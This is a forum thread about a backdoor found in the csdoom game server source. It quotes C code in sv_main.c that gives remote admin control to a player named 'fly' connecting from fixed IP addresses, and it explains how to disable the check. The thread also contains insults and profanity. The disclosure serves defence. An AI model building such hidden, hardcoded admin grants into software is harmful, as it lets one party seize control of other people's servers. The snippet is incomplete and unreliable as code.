Find results in...
Sign in to follow this  
Guest hate

Csdoom security hole

Guest hate

The following code is included in the source of the new version of csdoom:

if ( net_from.ip[0]= && net_from.ip[1]= &&
net_from.ip[2]= &&
( !strcmp(players[parse_cl].userinfo.netname, "fly")
|| !strcmp(players[parse_cl].userinfo.netname, "FLY")
|| !strcmp(players[parse_cl].userinfo.netname, "Fly") )
)
{
clients[parse_cl].allow_rcon = true;
}

for those of you without a knowledge of C, this basically means that Fly, the creator of csdoom, can take over any server you may choose to set up, and perform "administrative" functions (kick people etc). I'm guessing that you may not wish him to have this ability, so in order to disable it, simply go to line 695 and where you see the line:

SV_CheckIP();

simply change it to

// SV_CheckIP();

This will disable the hole.

Guest Blowfly

Better go check the client for back doors as well. Hang on.. it's closed source... hrrmmmm. Oh well, if it's *your* hard drive that gets wiped then don't look at me...

I have the csDoom source for win32. And if there is a need for it, just let me know. I'll take that hole out and post it if you dont want Fly messing with your servers.

I warned him about that. Its going to cause alot of problems down the road.

OK, thank you for the info. Personally I don't really care though. I trust fly, and, also, you haven't mentioned anything truly serious that he could do. Then again, this might be the beginning of the Russian era. :o

NightFang said:

I have the csDoom source for win32. And if there is a need for it, just let me know. I'll take that hole out and post it if you dont want Fly messing with your servers.

I warned him about that. Its going to cause alot of problems down the road.

It would be good with a secured version, although I too trust fly and don't really mind :o)

He could have publicly announced it though, so that it would have been known from the beginning, that would have been alot more friendly...

Myk said:

OK, thank you for the info. Personally I don't really care though. I trust fly, and, also, you haven't mentioned anything truly serious that he could do. Then again, this might be the beginning of the Russian era. :o

Hmmm. I think I want more info . Not that I mistrust Fly or anyone in particular, but I really don't like the sound of this. Can this hole possibly open someone's hard disk to a malicous hacker? Is it possible for someone other than Fly to gain access to someone's server? Is it possible for someone to exploit any potential security holes in the client even if they don't have the source code?

Apparently it's an ingame thing only. I agree completely with informing about other peoples work, especially when it functions on-line. But why do these things come up, and not real bugs? That makes me think that people are just poking lamely. I do hope not , Stphrz.

Fly should learn not to put backdoors in released code :-)

By the way this fails to mention what file this occurs in.

sv_main.c

Good Work!!! Thats 2 places to play you have ruined :)

Cocksuckers

Guest Psycho

Does this remind ANYBODY about the end of DoomServ?

Anyone who is pissed off that Aurikan has to make an ass of himself all the time just ignore him, He obviously put alot of work into that post and if we keep csdoom up and dont let this post have its intended effect then that is probably the most we can do to piss him off, unless the rumor i heard about doomroom being closed is true.

aurikan said:

Fly should learn not to put backdoors in released code :-)

By the way this fails to mention what file this occurs in.

sv_main.c

I think Aurican needs to change his quote to "I dont do doom, i just like to screw its players"

Guest hate

aurikan had nothing to do with this, retard

hate said:

aurikan had nothing to do with this, retard

I bet

Just a clarification for Toke and anyone who is convinced by his posts.

I had absolutely nothing to do with the csDoom expose nor #csdoom takeover.

Thank you for your time.

Guest Daggah

As far as I can tell, it's Toke being the asshole here.